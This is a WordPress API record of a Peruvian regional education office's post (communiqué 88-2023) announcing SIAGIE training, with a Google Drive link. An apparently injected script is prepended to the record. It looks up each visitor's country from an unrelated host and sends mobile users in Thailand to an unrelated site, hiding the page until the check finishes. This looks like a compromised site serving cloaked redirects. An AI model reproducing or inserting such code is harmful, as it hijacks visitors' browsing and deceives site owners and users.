<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":2937,"date":"2023-03-22T14:50:50","date_gmt":"2023-03-22T19:50:50","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=2937"},"modified":"2023-03-22T14:52:45","modified_gmt":"2023-03-22T19:52:45","slug":"comunicado-n-o88-2023-capacitacion-de-siagie","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n-o88-2023-capacitacion-de-siagie\/","title":{"rendered":"COMUNICADO N.\u00ba88 \u2013 2023 \u2013 CAPACITACI\u00d3N DE SIAGIE"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li>Registro de calificaciones de postergaci\u00f3n de evaluaci\u00f3n 2022.<\/li>\n\n\n\n<li>Registro de calificaciones de recuperaci\u00f3n PG 2022 y \u00e1rea a cargo.<\/li>\n\n\n\n<li>Formatos de n\u00f3minas de matr\u00edcula 2023.<\/li>\n<\/ul>\n\n\n\n<p><a href=\"https:\/\/drive.google.com\/file\/d\/104cgwIQHA3RUx4CXOjjZIFqX3iCrGaAb\/view?usp=share_link\">https:\/\/drive.google.com\/file\/d\/104cgwIQHA3RUx4CXOjjZIFqX3iCrGaAb\/view?usp=share_link<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>https:\/\/drive.google.com\/file\/d\/104cgwIQHA3RUx4CXOjjZIFqX3iCrGaAb\/view?usp=share_link<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,11],"tags":[],"class_list":["post-2937","post","type-post","status-publish","format-standard","hentry","category-comunicados","category-noticias"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2937","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=2937"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2937\/revisions"}],"predecessor-version":[{"id":2939,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2937\/revisions\/2939"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=2937"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=2937"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=2937"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}